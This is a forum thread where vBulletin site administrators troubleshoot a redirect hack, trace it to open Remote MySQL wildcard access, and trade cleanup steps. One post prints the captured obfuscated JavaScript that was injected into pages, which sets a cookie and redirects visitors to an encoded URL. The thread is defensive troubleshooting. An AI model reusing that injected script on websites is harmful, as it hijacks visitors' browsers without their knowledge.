Announcement

Collapse
No announcement yet.

vBulletin 3.x and 4.x Redirect Security Exploit

Collapse
This topic is closed.
X
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Originally posted by Paul M View Post
    By "participated" you mean I made one post, which was a question. That doesnt mean Im suddenly aware of a sitemap exploit.

    JFYI, a few posts down, Mert posted "I am sorry but we are talking about vBSEO product not sitemap generator.".
    Yeah that's right, but the site-map exploit was mentioned by Andreas in this topic and because of this Mert added a PL1 update at vb.org, and you're right "participation" doesn't implied you've read all posts regarding this issue
    .......

    Comment


    • After reading Merts reply to my question, I never returned to that thread until tonight.
      Baby, I was born this way

      Comment


      • The release Mert mentioned is shown as vbseo_sitemap-3-0_PL1 on the zip file
        Seems my own problem with the sitemap errors were down to not setting vbseo to kill non English characters in the urls
        Fat fingered user error on that one

        I know there has also been another pr update this week which can affect traffic for a few days
        .

        Comment


        • Originally posted by Jason Dunn View Post
          I'm curious, is there anyone out there getting hit by the file2store.info exploit that does NOT have vbSEO installed? It looks like this is 100% on vbSEO to fix, but maybe I'm wrong about that...
          Hey Jason, long time...

          I removed vbSEO and installed vBulletin CLEAN on June 29. I'm still getting this redirect issue. My traffic went from 800 visits/day last July, crushing my site's pagerank, traffic, etc., to 40-80, and it's remained that way ever since.

          I don't know if this is it, but I used Charles to check the response when going to my site and it returned this:

          Code:
          <html><head></head><body><script type="text/javascript">var vbsp='A0620CB8';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('t a=["\\z\\b\\c\\n\\e\\j\\b","\\k\\b\\c\\n\\e\\j\\b","\\A\\x\\b\\L\\f\\e\\p\\b\\k\\i","\\c\\d\\K\\M\\n\\N\\c\\p\\e\\o\\z","\\q\\d\\d\\J\\e\\b","\\i","\\A\\x\\f\\s\\c\\l\\i\\g","\\D\\F\\k\\f","\\G","\\r\\d\\q\\s\\c\\e\\d\\o","\\l\\c\\c\\f\\H\\g\\g\\j\\P\\Q\\e\\r\\b\\k\\c\\d\\p\\b\\B\\q\\d\\j\\g\\m\\d\\R\\o\\r\\d\\s\\m\\B\\f\\l\\f\\S\\e\\m\\i"];E y(u,C){t h=I O();h[a[1]](h[a[0]]()+T);t w=a[2]+h[a[3]]();v[a[4]]=u+a[5]+C+w+a[6]};y(a[7],a[8]);v[a[9]]=a[U]+V;',58,58,'||||||||||_0x987b|x65|x74|x6F|x69|x70|x2F|_0x414cx4|x3D|x6D|x73|x68|x64|x54|x6E|x72|x63|x6C|x61|var|_0x414cx2|document|_0x414cx5|x20|ipbcc|x67|x3B|x2E|_0x414cx3|x76|function|x62|x31|x3A|new|x6B|x47|x78|x4D|x53|Date|x79|x66|x77|x3F|86400000|10|vbsp'.split('|'),0,{}))</script></body></html>
          I'm unsure if that is the culprit. I could not find that code anywhere in my database dump nor my files.

          Comment


          • Edit: feel free to remove this post. Posted in the wrong place. My apologies.
            <b>Erik J. Barzeski</b>

            Comment


            • With the help of the security people at RealWebHost.net, we have now positively identified the method for injecting this exploit as well as specific vulnerabilities that permitted it on a 3.83, since updated to 3.87 PL2: As it turns out, it was a server configuration and security issue combined with some specific attributes of vBulletin installations which gave the intruder direct access to the MySQL database.

              The key is first to check your settings in cPanel for Remote MySQL: Unless you are using a database on a remote server, i.e., NOT on localhost, this setting should say "There are no additional MySQL access hosts configured". If you have a specific database intentionally enabled, that too is okay. What should NEVER be there is the character % - this is a wildcard which allows ALL other servers to connect to the database. If you see the wildcard enabled, DELETE IT.

              Then, make sure you change your passwords to strong passwords for both cPanel and MySQL to ensure that no one can change this setting back without your knowledge.

              Then, pick any add-on, disable it, then re-enable it to clear the datastore.

              Finally, download the file tool_reparse.php from http://www.vbulletin.org/forum/showthread.php?t=220967 and let it find discrepancies in your compiled templates and rebuild them.
              Last edited by djbaxter; Sun 17th Jul '11, 3:19pm.
              Psychlinks Web Services Affordable Web Design & Site Management
              Specializing in Small Businesses and vBulletin/Xenforo Forums

              Comment


              • Cheers for that.
                1am in the morning here and I have just seen this. Im now in the process of having kittens
                Did the database check and found two entries
                192.168.1.%
                88.148.9.210

                Can I just kill those two entries or is the localhost one with the wild card % something to worry about deleting

                Thanks for all the hard work and persistence in finding the solution to this

                .

                Comment


                • Originally posted by Lee G View Post
                  Cheers for that.
                  1am in the morning here and I have just seen this. Im now in the process of having kittens
                  Did the database check and found two entries
                  192.168.1.%
                  88.148.9.210

                  Can I just kill those two entries or is the localhost one with the wild card % something to worry about deleting

                  Thanks for all the hard work and persistence in finding the solution to this

                  As far as I know, if you are only using the local MySQL, you shouldn't need ANYTHING listed in MySQL Remote. I own two forums and Admin three others - none of them have any entries under MySQL Remote and they are working just fine. I would delete them both. If you have to, you can always add one of them back.
                  Psychlinks Web Services Affordable Web Design & Site Management
                  Specializing in Small Businesses and vBulletin/Xenforo Forums

                  Comment


                  • Cheers for that.
                    I took the brave approach. Checked another cpanel and database I have set up on my server.
                    And it showed exactly as you said.
                    Killed both the above without any adverse effect apart from the forums seeming to speed up on page loads
                    Top man.
                    .

                    Comment


                    • I was having my second litter of kittens when I checked my cpanel today and found 192.168.1.% had returned

                      I have been in touch with my server techs and this is the reply they gave, which also clarifies the % wild card hacking

                      That is part of the MySQL server by default.

                      Because you can use IP wildcard values in host values (for example, '192.168.1.%' to match every host on a subnet), someone could try to exploit this capability by naming a host 192.168.1.somewhere.com. To foil such attempts, MySQL disallows matching on host names that start with digits and a dot. Thus, if you have a host named something like 1.2.example.com, its name never matches the host part of account names. An IP wildcard value can match only IP numbers, not host names.
                      .

                      Comment


                      • Originally posted by Lee G View Post
                        I was having my second litter of kittens when I checked my cpanel today and found 192.168.1.% had returned

                        I have been in touch with my server techs and this is the reply they gave, which also clarifies the % wild card hacking


                        That is part of the MySQL server by default.

                        Because you can use IP wildcard values in host values (for example, '192.168.1.%' to match every host on a subnet), someone could try to exploit this capability by naming a host 192.168.1.somewhere.com. To foil such attempts, MySQL disallows matching on host names that start with digits and a dot. Thus, if you have a host named something like 1.2.example.com, its name never matches the host part of account names. An IP wildcard value can match only IP numbers, not host names.
                        But it doesn't really clarify it at all. I have a dedicated server with something like 10 databases running over several sites. NONE of them have any entries in MySQL Remote at all. cPanel does not create those entries by default when you set up a database and if you are running sites using MySQL on localhost you do NOT need anything entered in MySQL Remote. Indeed, anything entered in MySQL Remote should be considered suspicious by default unless you are actually using remoted databases (i.e., databases on a separate server).
                        Psychlinks Web Services Affordable Web Design & Site Management
                        Specializing in Small Businesses and vBulletin/Xenforo Forums

                        Comment


                        • The cpanel glitch I have, is mentioned on the cpanel support forum
                          http://forums.cpanel.net/f354/delete...-a-148389.html
                          Seems like others have experienced the return of 192.168.1.% after they have deleted it
                          It dont make whats happening right.
                          .

                          Comment


                          • Looks like I got hit twice in twenty minutes tonight

                            Had two blank emails turn up twenty minutes apart, using the Check 4 Hack mod

                            Location of injections reported pluginlist
                            .

                            Comment


                            • To reiterate, you can erase it temporarily by disabling and then re-enabling any product but the key is to figure out how the bastard is getting in.

                              Have you changed your passwords, especially for cPanel and phpMyAdmin? Is your AdminCP folder password protected? Do you have

                              Code:
                              Options All -Indexes
                              in the .htaccess file in your root? HAve you removed all entries from MySQL Remote?

                              What version of vBulletin are you running again?
                              Psychlinks Web Services Affordable Web Design & Site Management
                              Specializing in Small Businesses and vBulletin/Xenforo Forums

                              Comment


                              • Looks like it might have been a false positive this time
                                As soon as I added evolve chat bar the errors came in
                                http://www.vbulletin.org/forum/showthread.php?t=258158
                                Uninstalled the bar, run the test and the warnings went
                                Im not taking any chances on this one

                                Touch wood, my remote access on the database has not come back
                                .

                                Comment

                                Related Topics

                                Collapse

                                Working...
                                X